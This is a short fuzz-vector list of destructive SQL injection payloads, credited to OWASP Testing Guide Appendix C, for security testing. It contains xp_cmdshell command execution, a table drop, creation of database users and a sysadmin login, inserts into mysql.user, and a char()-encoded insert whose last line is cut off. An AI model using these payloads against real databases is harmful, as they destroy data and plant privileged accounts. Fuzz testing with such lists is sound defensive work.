#Active SQL injection vectors (Can impact/nuke the DB)
#taken from OWASP Testing Guide v3 Appendix C: Fuzz vectors:
#https://www.owasp.org/index.php/OWASP_Testing_Guide_Appendix_C:_Fuzz_Vectors
#which defines the license (on April 2012) as:
#Creative Commons 3.0: http://creativecommons.org/licenses/by-sa/3.0/
'; exec master..xp_cmdshell 'ping 10.10.1.2'--
CREATE USER name IDENTIFIED BY 'pass123'
CREATE USER name IDENTIFIED BY pass123 TEMPORARY TABLESPACE temp DEFAULT TABLESPACE users;
' ; drop table temp --
exec sp_addlogin 'name' , 'password'
exec sp_addsrvrolemember 'name' , 'sysadmin'
INSERT INTO mysql.user (user, host, password) VALUES ('name', 'localhost', PASSWORD('pass123'))
GRANT CONNECT TO name; GRANT RESOURCE TO name;
INSERT INTO Users(Login, Password, Level) VALUES( char(0x70) + char(0x65) + char(0x74) + char(0x65) + char(0x72) + char(0x70)
 + char(0x65) + char(0x74) + char(0x65) + char(0x72),char(0x64)
